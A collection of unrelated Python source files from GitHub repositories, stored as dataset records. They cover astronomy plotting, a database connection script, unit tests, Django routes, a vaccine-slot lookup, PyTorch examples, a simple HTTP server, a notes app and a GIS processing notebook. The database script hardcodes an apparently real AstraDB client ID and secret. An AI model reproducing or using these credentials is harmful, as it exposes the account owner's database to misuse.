= True \n # Maximum number of ticks to avoid overcrowding\n ax.xaxis.set_major_locator(MaxNLocator(4))\n ax.yaxis.set_major_locator(MaxNLocator(3))\n # The line type and identifier of each data set are stored for the legend\n legend_lines.append(mpl.lines.Line2D(tem_funct, tem_funct, color=data['color'], linestyle='-'))\n legend_text.append(data['ID'])\n if first_done:\n first = False\n # The label of the reference temperature values are only plotted above the last plot\n for tem in self.ref_tem:\n ax.text(tem, ax.get_ylim()[1], ' %0.0f K' % (10 ** tem), ha=\"left\", va=\"bottom\", \n rotation=65, fontsize=12, color='#FF0000', alpha=0.35)\n # Axis labels, title and legend \n fig.text(.5, .05, \"Log($T_e/K$)\", fontsize=16, ha='center', va='top')\n fig.text(.05, .5, \"$\\Omega$\", va='center', fontsize=20, rotation=90)\n fig.text(.5, .95, \"[%s %s] collision strengths\" % (self.elem, int_to_roman(int(self.spec))), \n color=\"#191970\", fontsize=16, ha='center')\n# plt.legend(legend_lines, legend_text, loc='upper right', borderpad=1, \n# labelspacing=1, bbox_to_anchor=(1, 1 * coll_n_max))\n axes[0, coll_n_max-2].legend(legend_lines, legend_text, loc='upper right', borderpad=1, \n labelspacing=1)\n for ax, ax_plt in zip(axes.ravel(), axes_plotaxis.ravel()):\n if not ax_plt:\n ax.set_axis_off()\n #plt.tight_layout()\n if save:\n fig.savefig(self.atom_rom + \"_CS.pdf\")\n \n fig.show()\n\n\n def tem_in_K(self, tem_units, tem):\n \"\"\"\n Convert the temperature from the unit of the fits file into K\n\n Parameters:\n tem_units: 'log(K)' or 'K/1000'\n tem: temperature\n \"\"\"\n \n if (tem_units == \"log(K)\"):\n return np.power(10., tem)\n elif (tem_units == \"K/10000\"):\n return np.multiply(tem, 1.e4)\n else: #T in Kelvin in the fits file\n return tem\n \n \n","repo_name":"Morisset/PyNeb_devel","sub_path":"pyneb/plot/plotAtomicData.py","file_name":"plotAtomicData.py","file_ext":"py","file_size_in_byte":23861,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"54"} +{"seq_id":"17763104291","text":"from cassandra.cluster import Cluster\nfrom cassandra.auth import PlainTextAuthProvider\nimport pathlib\n#from . import config\n\nBASE_DIR = pathlib.Path(__file__).resolve().parent\n\n#settings = config.get_settings()\nASTRADB_CONNECT_BUNDLE = BASE_DIR / \"connect_bundle\" / \"secure-connect-video-based-learning-platform-2.zip\"\n\nASTRADB_CLIENT_ID= \"cIsXkYgvPldmsWiEYaATRwhU\"\nASTRADB_CLIENT_SECRET = \"KTmZBMNUvax8.EmeQiNNWQehiHLRB8OzGgWog+a+imt7DZrOk1bd+3Dzr2t9AA0-E+Fv5q4D5E8i545tPSxe_CEtAiJDs53FwZsedxubtxyrL8fXPKXyeyrqOafdXWZf\"\n\ncloud_config= {\n 'secure_connect_bundle': ASTRADB_CONNECT_BUNDLE\n}\nauth_provider = PlainTextAuthProvider(ASTRADB_CLIENT_ID, ASTRADB_CLIENT_SECRET)\ncluster = Cluster(cloud=cloud_config, auth_provider=auth_provider)\nsession = cluster.connect()\n\nrow = session.execute(\"select release_version from system.local\").one()\nif row:\n print(row[0])\nelse:\n print(\"An error occurred.\")","repo_name":"AbelBekele/Video-based-learning-platform","sub_path":"app/connect_database.py","file_name":"connect_database.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"10045865511","text":"import os\nfrom tempfile import TemporaryDirectory\n\nfrom pandas import DataFrame, Series\n\nfrom pyfibre.pyfibre_runner import PyFibreRunner\nfrom pyfibre.model.objects.segments import (\n FibreSegment, CellSegment\n)\nfrom pyfibre.tests.pyfibre_test_case import PyFibreTestCase\nfrom pyfibre.tests.probe_classes.objects import (\n ProbeFibreNetwork, generate_probe_segment)\nfrom pyfibre.tests.probe_classes.utilities import (\n generate_image, generate_probe_graph)\n\nfrom ..shg_analyser import SHGAnalyser\n\nfrom .probe_classes import ProbeSHGImage\n\n\nclass TestSHGAnalyser(PyFibreTestCase):\n\n def setUp(self):\n self.image, _, _, _ = generate_image()\n self.network = generate_probe_graph()\n self.fibre_networks = [ProbeFibreNetwork()]\n self.fibre_segments = [generate_probe_segment(FibreSegment)]\n self.cell_segments = [generate_probe_segment(CellSegment)]\n\n self.multi_image = ProbeSHGImage()\n self.analyser = SHGAnalyser(\n multi_image=self.multi_image\n )\n self.runner = PyFibreRunner()\n\n def test_file_paths(self):\n\n directory = os.path.join('path', 'to', 'image')\n\n self.multi_image.path = directory\n self.assertEqual(\n os.path.join(directory, 'test-shg-pyfibre-analysis', 'data'),\n self.analyser.data_path)\n self.assertEqual(\n os.path.join(directory, 'test-shg-pyfibre-analysis', 'fig'),\n self.analyser.fig_path)\n self.assertEqual(\n os.path.join(\n directory, 'test-shg-pyfibre-analysis', 'data', 'test-shg'),\n self.analyser._data_file)\n self.assertEqual(\n os.path.join(\n directory, 'test-shg-pyfibre-analysis', 'fig', 'test-shg'),\n self.analyser._fig_file)\n\n def test_get_ow_options(self):\n\n with TemporaryDirectory() as tmp_dir:\n self.multi_image.path = tmp_dir\n\n ow_network, ow_segment, ow_metric = (\n self.analyser.get_analysis_options(self.runner)\n )\n\n self.assertTrue(ow_network)\n self.assertTrue(ow_segment)\n self.assertTrue(ow_metric)\n\n def test_make_directories(self):\n with TemporaryDirectory() as tmp_dir:\n self.multi_image.path = tmp_dir\n self.analyser.make_directories()\n\n self.assertTrue(\n os.path.exists(\n os.path.join(\n tmp_dir,\n \"test-shg-pyfibre-analysis\"\n )\n )\n )\n self.assertTrue(\n os.path.exists(\n os.path.join(\n tmp_dir,\n \"test-shg-pyfibre-analysis\",\n \"data\"\n )\n )\n )\n self.assertTrue(\n os.path.exists(\n os.path.join(\n tmp_dir,\n \"test-shg-pyfibre-analysis\",\n \"fig\"\n )\n )\n )\n\n def test_save_load_networks(self):\n self.analyser._network = self.network\n self.analyser._fibre_networks = self.fibre_networks\n\n with TemporaryDirectory() as tmp_dir:\n self.multi_image.path = tmp_dir\n self.analyser.make_directories()\n\n self.analyser._save_networks()\n\n networks = ['test-shg_fibre_networks.json',\n 'test-shg_network.pkl']\n\n for network in networks:\n self.assertIn(\n network,\n os.listdir(\n os.path.join(\n tmp_dir,\n \"test-shg-pyfibre-analysis\",\n \"data\"\n )\n )\n )\n\n self.analyser._load_networks()\n\n self.assertListEqual(\n list(self.network.nodes),\n list(self.analyser._network.nodes))\n self.assertListEqual(\n list(self.network.edges),\n list(self.analyser._network.edges))\n\n self.assertEqual(1, len(self.analyser._fibre_networks))\n self.assertListEqual(\n list(self.fibre_networks[0].graph.nodes),\n list(self.analyser._fibre_networks[0].graph.nodes))\n self.assertListEqual(\n list(self.fibre_networks[0].graph.edges),\n list(self.analyser._fibre_networks[0].graph.edges))\n\n def test_save_load_segments(self):\n self.multi_image.shg_image = self.image\n self.analyser._fibre_segments = self.fibre_segments\n self.analyser._cell_segments = self.cell_segments\n\n with TemporaryDirectory() as tmp_dir:\n self.multi_image.path = tmp_dir\n self.analyser.make_directories()\n\n self.analyser._save_segments()\n\n segments = ['test-shg_cell_segments.npy',\n 'test-shg_fibre_segments.npy']\n\n for segment in segments:\n self.assertIn(\n segment,\n os.listdir(\n os.path.join(\n tmp_dir,\n \"test-shg-pyfibre-analysis\",\n \"data\"\n )\n )\n )\n\n self.analyser._load_segments()\n\n self.assertEqual(1, len(self.analyser._fibre_segments))\n self.assertEqual(1, len(self.analyser._cell_segments))\n self.assertArrayAlmostEqual(\n self.fibre_segments[0].region.intensity_image,\n self.analyser._fibre_segments[0].region.intensity_image\n )\n self.assertArrayAlmostEqual(\n self.cell_segments[0].region.intensity_image,\n self.analyser._cell_segments[0].region.intensity_image\n )\n\n def test_save_load_databases(self):\n self.analyser._databases = tuple(\n [DataFrame()] * 4\n )\n\n with TemporaryDirectory() as tmp_dir:\n self.multi_image.path = tmp_dir\n self.analyser.make_directories()\n\n self.analyser._save_databases()\n\n databases = ['test-shg_network_metric.xls',\n 'test-shg_network_metric.h5',\n 'test-shg_fibre_metric.xls',\n 'test-shg_global_metric.xls',\n 'test-shg_fibre_metric.h5',\n 'test-shg_cell_metric.h5',\n 'test-shg_global_metric.h5',\n 'test-shg_cell_metric.xls']\n\n for database in databases:\n self.assertIn(\n database,\n os.listdir(\n os.path.join(\n tmp_dir,\n \"test-shg-pyfibre-analysis\",\n \"data\"\n )\n )\n )\n\n self.analyser._load_databases()\n\n self.assertEqual(4, len(self.analyser._databases))\n\n def test_network_analysis(self):\n\n self.assertDictEqual(\n {'nuc_thresh': 2,\n 'nuc_radius': 11,\n 'lmp_thresh': 0.15,\n 'angle_thresh': 70,\n 'r_thresh': 7},\n self.analyser.fire_parameters)\n\n self.multi_image.shg_image = self.multi_image.shg_image[:50, :50]\n\n self.analyser.network_analysis(\n sigma=self.runner.sigma,\n alpha=self.runner.alpha,\n scale=self.runner.scale,\n p_denoise=self.runner.p_denoise\n )\n\n self.assertEqual(38, self.analyser._network.number_of_nodes())\n self.assertEqual(37, self.analyser._network.number_of_edges())\n self.assertEqual(2, len(self.analyser._fibre_networks))\n\n def test_segment_analysis(self):\n\n self.assertDictEqual(\n {'min_fibre_size': 100,\n 'min_fibre_frac': 0.1,\n 'min_cell_size': 200,\n 'min_cell_frac': 0.01},\n self.analyser.segment_parameters)\n\n def test_create_metrics(self):\n self.analyser._fibre_networks = self.fibre_networks\n self.analyser._fibre_segments = self.fibre_segments\n self.analyser._cell_segments = self.cell_segments\n\n self.analyser.create_metrics(sigma=self.runner.sigma)\n\n self.assertEqual((19,), self.analyser._databases[0].shape)\n self.assertEqual((1, 11), self.analyser._databases[1].shape)\n self.assertEqual((1, 9), self.analyser._databases[2].shape)\n\n self.assertIsInstance(self.analyser._databases[0], Series)\n for database in self.analyser._databases[1:3]:\n self.assertIsInstance(database, DataFrame)\n self.assertIsNone(self.analyser._databases[3])\n\n def test_create_figures(self):\n\n with TemporaryDirectory() as tmp_dir:\n self.multi_image.path = tmp_dir\n self.analyser.make_directories()\n\n self.analyser.create_figures()\n\n figures = ['test-shg_SHG.png',\n 'test-shg_tensor.png']\n\n for figure in figures:\n self.assertIn(\n figure,\n os.listdir(\n os.path.join(\n tmp_dir,\n \"test-shg-pyfibre-analysis\",\n \"fig\"\n )\n )\n )\n","repo_name":"franklongford/PyFibre","sub_path":"pyfibre/addons/shg_pl_trans/tests/test_shg_analyser.py","file_name":"test_shg_analyser.py","file_ext":"py","file_size_in_byte":9526,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"6593334031","text":"from django.urls import path\nfrom accounts import views\n\nurlpatterns = [\n path('login/', views.login_view, name='login_user'),\n path('logout/', views.logout_user, name='logout_user'),\n path('signup/', views.register_view, name='signup_user'),\n path('update/', views.update_user, name='update_user'),\n path('delete/', views.delete_user, name='delete_user')\n]\n","repo_name":"Timofey72/scraping_service-project","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18946047928","text":"from cowin_api import CoWinAPI\nimport pandas as pd\ncowin = CoWinAPI()\ndef myprint(arr):\n an = \"\"\n mastercount=0\n for i in arr:\n an += \"\\nName:\"+i['name']\n # an+= \"\\nSessions:\"\n # print(\"Name:\",i['name'])\n # print(\"Sessions:\")\n count=0\n for j in i['sessions']:\n if(j['available_capacity']!=0):\n count+=1\n # an += \"\\nDate\"+j['date']\n # print(\"Date\",j['date'])\n an+= \"\\nAvailable: \"+str(j['available_capacity'])\n # print(\"Available: \",j['available_capacity'])\n # print(\"Slots:\")\n # an+=\"\\nSlots:\"\n # for k in j['slots']:\n \n # an+=\"\\n\"+k\n # print(an) \n mastercount+=count\n \n if(mastercount==0):\n return \"No Available slot for given day\"\n \n return an\ndef driver(pin_code):\n # pin_code = \"326001\"\n # date = '08-05-2021' # Optional. Default value is today's date\n # min_age_limit = 45\n try:\n available_centers = cowin.get_availability_by_pincode(pin_code)\n except:\n available_centers = cowin.get_availability_by_district(pin_code)\n \n return myprint(available_centers['centers'])\n\n\ndef states():\n myStates = cowin.get_states()\n ans=\"\"\n for i in myStates['states']:\n ans+=\"\\n\"+str(i['state_id'])+\" \"+ i['state_name']\n return ans\ndef districts(id):\n ans=\"\"\n state_id=id\n districts = cowin.get_districts(state_id)\n for i in districts['districts']:\n ans+=\"\\n\"+str(i[\"district_id\"])+\" \"+i['district_name']\n return ans\n# print(an)\n# f = open(\"output.txt\", \"a\")\n# f.write(\"Now the file has more content!\\n\")\n# f.close()\n\n# #open and read the file after the appending:\n# f = open(\"demofile2.txt\", \"r\")\n# print(f.read())","repo_name":"picografix/covidhelpbot","sub_path":"cowin.py","file_name":"cowin.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"26773533672","text":"# encoding: utf-8\nimport torch\nimport numpy as np\n\ndef gen_data(num=1000):\n x = torch.unsqueeze(torch.linspace(-1, 1, num), dim=1) # x data (tensor), shape=(100, 1)\n y = x.pow(2) + 0.2 * torch.rand(x.size())\n y = y.mean(0)\n return x.squeeze(), y\nclass Net(torch.nn.Module):\n def __init__(self):\n super(Net,self).__init__()\n self.hidden=torch.nn.Linear(1000,10)\n self.predict=torch.nn.Linear(10,1)\n def forward(self,x):\n out=self.hidden(x)\n out=self.predict(out)\n return out\n\ndef train(x,y):\n net=Net()\n optimizer = torch.optim.SGD(net.parameters(), lr=0.01)\n for epoch in range(100):\n out=net(x)\n l=(out-y)*(out-y)\n optimizer.zero_grad()\n l.backward()\n optimizer.step()\n print(\"progress\", epoch, l.data)\n out = net(x)\n l = (out - y) * (out - y)\n print(l.data)\n\nif __name__ == '__main__':\n x, y = gen_data()\n train(x,y)","repo_name":"yuanjie-ai/tql-Python","sub_path":"ext/NN/Torch/02_TASK/nn.py","file_name":"nn.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"54"} +{"seq_id":"11445397195","text":"import torch\nimport ccl_cuda\nimport time\n\n\n\nimg_3d = (torch.rand(128, 256, 256) * 255.0).to(torch.uint8).cuda()\nprint(img_3d)\nimg_2d = img_3d[0]\nprint(img_3d.shape)\n\nprint(\"ccl on gpu (12800 times) - single\")\nfor i in range(5120):\n output = ccl_cuda.ccl(img_2d)\n\nstart_time = time.time()\nfor i in range(12800):\n output = ccl_cuda.ccl(img_2d)\n numbers = torch.unique(output)\nprint(\"using time: %.2fs\" % (time.time() - start_time))\nprint(numbers)\n\n\nprint(\"ccl on gpu (12800 times) - batch\")\nfor i in range(10):\n output = ccl_cuda.ccl_batch(img_3d)\n numbers = torch.unique(output.view(128, -1), dim=1)\n\nstart_time = time.time()\nfor i in range(100):\n output = ccl_cuda.ccl_batch(img_3d)\n numbers = torch.unique(output)\nprint(numbers)\n\n\nprint(\"using time: %.2fs\" % (time.time() - start_time))","repo_name":"czczup/FAST","sub_path":"models/post_processing/ccl/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":104,"dataset":"github-code","pt":"54"} +{"seq_id":"72630563361","text":"# Modified from https://raw.githubusercontent.com/fadel/pytorch_ema/master/torch_ema/ema.py\n\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport torch\n\n\n# Partially based on: https://github.com/tensorflow/tensorflow/blob/r1.13/tensorflow/python/training/moving_averages.py\nclass ExponentialMovingAverage:\n \"\"\"\n Maintains (exponential) moving average of a set of parameters.\n \"\"\"\n\n def __init__(self, parameters, decay, use_num_updates=True):\n \"\"\"\n Args:\n parameters: Iterable of `torch.nn.Parameter`; usually the result of\n `model.parameters()`.\n decay: The exponential decay.\n use_num_updates: Whether to use number of updates when computing\n averages.\n \"\"\"\n if decay < 0.0 or decay > 1.0:\n raise ValueError('Decay must be between 0 and 1')\n self.decay = decay\n self.num_updates = 0 if use_num_updates else None\n self.shadow_params = [p.clone().detach()\n for p in parameters if p.requires_grad]\n self.collected_params = []\n\n def update(self, parameters):\n \"\"\"\n Update currently maintained parameters.\n\n Call this every time the parameters are updated, such as the result of\n the `optimizer.step()` call.\n\n Args:\n parameters: Iterable of `torch.nn.Parameter`; usually the same set of\n parameters used to initialize this object.\n \"\"\"\n decay = self.decay\n if self.num_updates is not None:\n self.num_updates += 1\n decay = min(decay, (1 + self.num_updates) / (10 + self.num_updates))\n one_minus_decay = 1.0 - decay\n with torch.no_grad():\n parameters = [p for p in parameters if p.requires_grad]\n for s_param, param in zip(self.shadow_params, parameters):\n s_param.sub_(one_minus_decay * (s_param - param))\n\n def copy_to(self, parameters):\n \"\"\"\n Copy current parameters into given collection of parameters.\n\n Args:\n parameters: Iterable of `torch.nn.Parameter`; the parameters to be\n updated with the stored moving averages.\n \"\"\"\n parameters = [p for p in parameters if p.requires_grad]\n for s_param, param in zip(self.shadow_params, parameters):\n if param.requires_grad:\n param.data.copy_(s_param.data)\n\n def store(self, parameters):\n \"\"\"\n Save the current parameters for restoring later.\n\n Args:\n parameters: Iterable of `torch.nn.Parameter`; the parameters to be\n temporarily stored.\n \"\"\"\n self.collected_params = [param.clone() for param in parameters]\n\n def restore(self, parameters):\n \"\"\"\n Restore the parameters stored with the `store` method.\n Useful to validate the model with EMA parameters without affecting the\n original optimization process. Store the parameters before the\n `copy_to` method. After validation (or model saving), use this to\n restore the former parameters.\n\n Args:\n parameters: Iterable of `torch.nn.Parameter`; the parameters to be\n updated with the stored parameters.\n \"\"\"\n for c_param, param in zip(self.collected_params, parameters):\n param.data.copy_(c_param.data)\n\n def state_dict(self):\n return dict(decay=self.decay, num_updates=self.num_updates,\n shadow_params=self.shadow_params)\n\n def load_state_dict(self, state_dict):\n self.decay = state_dict['decay']\n self.num_updates = state_dict['num_updates']\n self.shadow_params = state_dict['shadow_params']","repo_name":"yang-song/score_sde_pytorch","sub_path":"models/ema.py","file_name":"ema.py","file_ext":"py","file_size_in_byte":3414,"program_lang":"python","lang":"en","doc_type":"code","stars":1269,"dataset":"github-code","pt":"54"} +{"seq_id":"34455471708","text":"# 웹 서버 서비스 구현\nfrom http.server import HTTPServer, CGIHTTPRequestHandler\n# CGIHTTPRequestHandler- 클라이언트와 서버사이에 데이터 주고받기,파이썬 파일 브라우저 출력용\n# jsp나 servlet파일을 할 수 없다 - 톰켓이 없기떄문/ 그외 다 자바스크립트 뷰 등등 다 사용가능\n\n# CGI(Common Gateway Interface) : 웹 서버와 외부 프로그램 사이에서 정보를 주고 받는 방법이나 규약\n# 대화형 웹 페이지를 작성할 수 있게 된다.\nclass Handler(CGIHTTPRequestHandler):\n cgi_directories = ['/cgi-bin'] #여러개 줄 수있다.\n\nserv = HTTPServer(('127.0.0.1',8889), Handler)\n\n# GET /favicon.ico HTTP/1.1\" 404 오류 - 페이지 상단에 이미지가 없다고 알려주는 것\nprint('웹 서버 서비스 시작...')\nserv.serve_forever()","repo_name":"KHG0217/python_study","sub_path":"pypro1/pack4_http/HttpServer.py","file_name":"HttpServer.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71503984481","text":"#!/usr/bin/env python3\n\nfrom pprint import pprint\nfrom collections import deque, defaultdict\nimport itertools\nimport math\nimport sys\n\nsys.setrecursionlimit(10 ** 6)\ninput = sys.stdin.buffer.readline\nINF = float('inf')\n\nn = int(input())\nnumbers = list(map(int, input().split()))\n\n# dp[i+1][j] := i番目までの数字と+, -で作った式の計算結果がjであるような式の数\n# 0 <= i <= n - 2, 0 <= j <= 20\n# dp[i+1][j] = max(dp[i][j], dp[i][j+a[i]], dp[i][j-a[i]])\n\n# dp = [[0 for j in range(21)] for i in range(n)]\n\n# dp[1][numbers[0]] = 1\n\n# for i in range(n - 1):\n# for j in range(21):\n# if dp[i][j] > 0:\n# plus = j + numbers[i]\n# minus = j - numbers[i]\n# if 0 <= plus <= 20:\n# dp[i+1][plus] += dp[i][j]\n# if 0 <= minus <= 20:\n# dp[i+1][minus] += dp[i][j]\n\n# print(dp[n-1][numbers[-1]])\n\n# ---\n# dp[i][j] := 左からi個の穴それぞれに+, -を入れた式の計算結果がjである式の数\n# a_0 + a_1 + ... + a_k\n# 0 <= i <= n - 2, 0 <= j <= 20\n# dp[i][j] = dp[i-1][j+a[i]] + dp[i-1][j-a[i]]\n\ndp = [[0 for j in range(21)] for i in range(n - 1)]\n\ndp[0][numbers[0]] = 1\n\nfor i in range(1, n - 1):\n for j in range(21):\n plus = j + numbers[i]\n minus = j - numbers[i]\n if 0 <= plus <= 20:\n dp[i][j] += dp[i-1][plus]\n if 0 <= minus <= 20:\n dp[i][j] += dp[i-1][minus]\n\nprint(dp[n-2][numbers[-1]])\n","repo_name":"d-matsui/atcorder","sub_path":"100-problems/review/dinamic-programming/39-first-grader.py","file_name":"39-first-grader.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15614668544","text":"import log\nimport add_new_note\nimport changes\nimport delete\nimport view\n\n# Промежуточная аттестация\n\n# Приложение заметки\n\n\n# Фаил main в котором прописан все возможности\n\n\nprint(\" Заметки(notes) \")\n\nlog.wr(\"start\")\n\n\n# make_file_json.start()\n\n\ndef main():\n print(\n \"Выберете что хотите сделать\\n1 - Посмотреть заметки \\n2 - Сделать новоую заметку \\n3 - Удалить заметку \\n4 - Изм��нить заметку\\n0 - Выйти \")\n\n operation = int(input(\": \"))\n print(\"\\n\\n\")\n while operation != 0:\n if operation == 1:\n view.view() # Решил попробывать сделать так, вроде все по правилам solid, если есть какие то недочеты прошу сообщить о них\n main()\n elif operation == 2:\n add_new_note.add()\n main()\n\n elif operation == 3:\n delete.delete()\n main()\n\n elif operation == 4:\n changes.find_and_change()\n main()\n else:\n print(\"Eror\\n\\n\")\n main()\n\n print(\"Пока! Bye!!\")\n log.wr2(\"close programm\")\n exit()\n\n\nmain()\n","repo_name":"Saven0k/PRoject-on-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9803281435","text":"\n# coding: utf-8\n\n# In[1]:\n\n\"\"\" Process master shapefile and store in multiple formats.\n-------------------------------------------------------------------------------\n\nAuthor: Rutger Hofste\nDate: 20181206\nKernel: python35\nDocker: rutgerhofste/gisdocker:ubuntu16.04\n\n\"\"\"\n\nSCRIPT_NAME = \"Y2018M12D06_RH_Master_Shape_V01\"\nOUTPUT_VERSION = 2\n\nNODATA_VALUE = -9999\n\nS3_INPUT_PATH = \"s3://wri-projects/Aqueduct30/processData/Y2018M12D06_RH_Master_Shape_Dissolve_01/output\"\nINPUT_FILE_NAME = \"Y2018M12D06_RH_Master_Shape_Dissolved_V01.shp\"\n\nBQ_PROJECT_ID = \"aqueduct30\"\nBQ_OUTPUT_DATASET_NAME = \"aqueduct30v01\"\n\nRDS_DATABASE_ENDPOINT = \"aqueduct30v05.cgpnumwmfcqc.eu-central-1.rds.amazonaws.com\"\nRDS_DATABASE_NAME = \"database01\"\n\nOUTPUT_TABLE_NAME = \"{}_v{:02.0f}\".format(SCRIPT_NAME,OUTPUT_VERSION).lower()\n\nec2_input_path = \"/volumes/data/{}/input_V{:02.0f}\".format(SCRIPT_NAME,OUTPUT_VERSION) \nec2_output_path = \"/volumes/data/{}/output_V{:02.0f}\".format(SCRIPT_NAME,OUTPUT_VERSION) \n\ns3_output_path = \"s3://wri-projects/Aqueduct30/processData/{}/output_V{:02.0f}/\".format(SCRIPT_NAME,OUTPUT_VERSION)\n\nprint(\"S3_INPUT_PATH: \",S3_INPUT_PATH,\n \"\\nec2_input_path: \",ec2_input_path,\n \"\\nec2_output_path: \",ec2_output_path,\n \"\\nBQ_OUTPUT_DATASET_NAME: \", BQ_OUTPUT_DATASET_NAME,\n \"\\nOUTPUT_TABLE_NAME: \",OUTPUT_TABLE_NAME,\n \"\\ns3_output_path: \", s3_output_path\n )\n\n\n# In[2]:\n\nimport time, datetime, sys\ndateString = time.strftime(\"Y%YM%mD%d\")\ntimeString = time.strftime(\"UTC %H:%M\")\nstart = datetime.datetime.now()\nprint(dateString,timeString)\nsys.version\n\n\n# In[3]:\n\nget_ipython().system('rm -r {ec2_input_path}')\nget_ipython().system('rm -r {ec2_output_path}')\nget_ipython().system('mkdir -p {ec2_input_path}')\nget_ipython().system('mkdir -p {ec2_output_path}')\n\n\n# In[4]:\n\nget_ipython().system('aws s3 cp {S3_INPUT_PATH} {ec2_input_path} --recursive ')\n\n\n# In[5]:\n\nimport os\nimport sqlalchemy\nimport multiprocessing\nimport pandas as pd\nimport geopandas as gpd\nimport numpy as np\nfrom google.cloud import bigquery\nfrom shapely.geometry.multipolygon import MultiPolygon\nfrom geoalchemy2 import Geometry, WKTElement\n\npd.set_option('display.max_columns', 500)\n\nos.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"/.google.json\"\nos.environ[\"GOOGLE_CLOUD_PROJECT\"] = \"aqueduct30\"\nclient = bigquery.Client(project=BQ_PROJECT_ID)\n\n\n# In[6]:\n\nF = open(\"/.password\",\"r\")\npassword = F.read().splitlines()[0]\nF.close()\n\nengine = sqlalchemy.create_engine(\"postgresql://rutgerhofste:{}@{}:5432/{}\".format(password,RDS_DATABASE_ENDPOINT,RDS_DATABASE_NAME))\nconnection = engine.connect()\n\n\n# In[7]:\n\ninput_path = \"{}/{}\".format(ec2_input_path,INPUT_FILE_NAME)\n\n\n# In[8]:\n\ngdf = gpd.read_file(input_path)\n\n\n# In[9]:\n\ngdf.head()\n\n\n# In[10]:\n\ngdf.shape\n\n\n# In[11]:\n\ngdf.dtypes\n\n\n# In[12]:\n\ngdf[['pfaf_id','gid_1','aqid']] = gdf.string_id.str.split('-', expand=True)\n\n\n# In[13]:\n\ngdf.replace(\"None\",str(NODATA_VALUE),inplace=True)\n\n\n# In[14]:\n\ngdf[\"pfaf_id\"] = pd.to_numeric(gdf[\"pfaf_id\"])\ngdf[\"aqid\"] = pd.to_numeric(gdf[\"aqid\"])\n\n\n# In[15]:\n\ngdf = gdf.sort_values(\"string_id\")\n\n\n# In[16]:\n\ngdf[\"aq30_id\"] = gdf.index\n\n\n# In[17]:\n\ngdf = gdf.reindex(sorted(gdf.columns), axis=1)\n\n\n# In[18]:\n\ngdf.head()\n\n\n# In[19]:\n\ndef uploadGDFtoPostGIS(gdf,tableName,saveIndex):\n # this function uploads a polygon shapefile to table in AWS RDS. \n # It handles combined polygon/multipolygon geometry and stores it in valid multipolygon in epsg 4326.\n \n # gdf = input geoDataframe\n # tableName = postGIS table name (string)\n # saveIndex = save index column in separate column in postgresql, otherwise discarded. (Boolean)\n \n \n gdf[\"type\"] = gdf.geometry.geom_type \n geomTypes = [\"Polygon\",\"MultiPolygon\"]\n \n for geomType in geomTypes:\n gdfType = gdf.loc[gdf[\"type\"]== geomType]\n geomTypeLower = str.lower(geomType)\n gdfType['geom'] = gdfType['geometry'].apply(lambda x: WKTElement(x.wkt, srid=4326))\n gdfType.drop([\"geometry\",\"type\"],1, inplace=True) \n print(\"Create table temp%s\" %(geomTypeLower)) \n gdfType.to_sql(\n name = \"temp%s\" %(geomTypeLower),\n con = engine,\n if_exists='replace',\n index= saveIndex, \n dtype={'geom': Geometry(str.upper(geomType), srid= 4326)}\n )\n \n # Merge both tables and make valid\n sql = []\n sql.append(\"DROP TABLE IF EXISTS %s\" %(tableName))\n sql.append(\"ALTER TABLE temppolygon ALTER COLUMN geom type geometry(MultiPolygon, 4326) using ST_Multi(geom);\")\n sql.append(\"CREATE TABLE %s AS (SELECT * FROM temppolygon UNION SELECT * FROM tempmultipolygon);\" %(tableName))\n sql.append(\"UPDATE %s SET geom = st_makevalid(geom);\" %(tableName))\n sql.append(\"DROP TABLE temppolygon,tempmultipolygon\")\n\n for statement in sql:\n print(statement)\n result = connection.execute(statement) \n gdfFromSQL =gpd.GeoDataFrame.from_postgis(\"select * from %s\" %(tableName),connection,geom_col='geom' )\n return gdfFromSQL\n\n\n# In[20]:\n\ngdf.shape\n\n\n# In[21]:\n\ngdfFromSQL = uploadGDFtoPostGIS(gdf,OUTPUT_TABLE_NAME,False)\n\n\n# In[22]:\n\ngdfFromSQL.shape\n\n\n# In[23]:\n\ngdfFromSQL.head()\n\n\n# In[24]:\n\ndestination_table = \"{}.{}\".format(BQ_OUTPUT_DATASET_NAME,OUTPUT_TABLE_NAME)\n\n\n# In[25]:\n\ngdfFromSQL.to_gbq(destination_table=destination_table,\n project_id=BQ_PROJECT_ID,\n chunksize=1000,\n if_exists=\"replace\")\n\n\n# In[26]:\n\noutput_file_path = \"{}/{}\".format(ec2_output_path,SCRIPT_NAME)\n\n\n# In[27]:\n\ngdf.to_pickle(output_file_path + \".pkl\")\n\n\n# In[28]:\n\ngdf.to_file(output_file_path + \".shp\",driver=\"ESRI Shapefile\")\n\n\n# In[29]:\n\nget_ipython().system('aws s3 cp {ec2_output_path} {s3_output_path} --recursive')\n\n\n# In[30]:\n\nend = datetime.datetime.now()\nelapsed = end - start\nprint(elapsed)\n\n\n# Previous runs: \n# 0:01:12.245867 \n# 0:48:09.273757\n\n# In[ 